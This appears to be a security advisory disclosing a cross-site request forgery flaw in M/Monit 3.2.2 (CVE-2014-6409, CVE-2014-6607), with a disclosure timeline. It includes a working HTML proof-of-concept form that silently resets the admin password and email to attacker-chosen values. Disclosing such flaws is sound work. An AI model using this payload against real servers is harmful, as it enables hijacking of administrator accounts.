Application: M/Monit 3.2.2 Author: Dolev Farhi @dolevff Date: 13.9.2014 Relevant CVEs: CVE-2014-6409, CVE-2014-6607 Vulnerable version: <= 3.2.2 M/Monit is an Easy, proactive monitoring of Unix systems, network and cloud services. 1. Vulnerability Description: Account hijack via cross-site request forgery (CVE-2014-6409, CVE-2014-6607) It was found that M/Monit latest version is vulnerable to CSRF attacks. it is possible to reset the password of any user account (admin/user) on the system without needing to know the current password of the attacked account, due to missing password change verification mechanism. 2. Proof of concept <html> <div align="center"> <pre> <h2> CSRF poc M/monit </h2> <body> <form action="http://mmonit_server:8080/admin/users/update" method="POST"> <input type="hidden" name="fullname" value="Administrator" /> <input type="hidden" name="password" value="attacker_pass" /> <input type="hidden" name="email" value="attacker@email.com" /> <input type="hidden" name="admin" value="on" /> <input type="hidden" name="uname" value="admin" /> <input type="submit" name="submit" value="submit" /> </form> </body> </div> </html> 3. Mitigation Software vendor confirmed the issue, and a fix might be released in the future. 4. Time line: 15.9 - Found vulnerabilities 15.9 - Notified software vendor 15.9 - CVE Requested 17.9 - CVEs Assigned 18.9 - Vendor confirmed security issues, release will be released in the future 19.9 - public disclosure - Discovered by Dolev Farhi, F5 Networks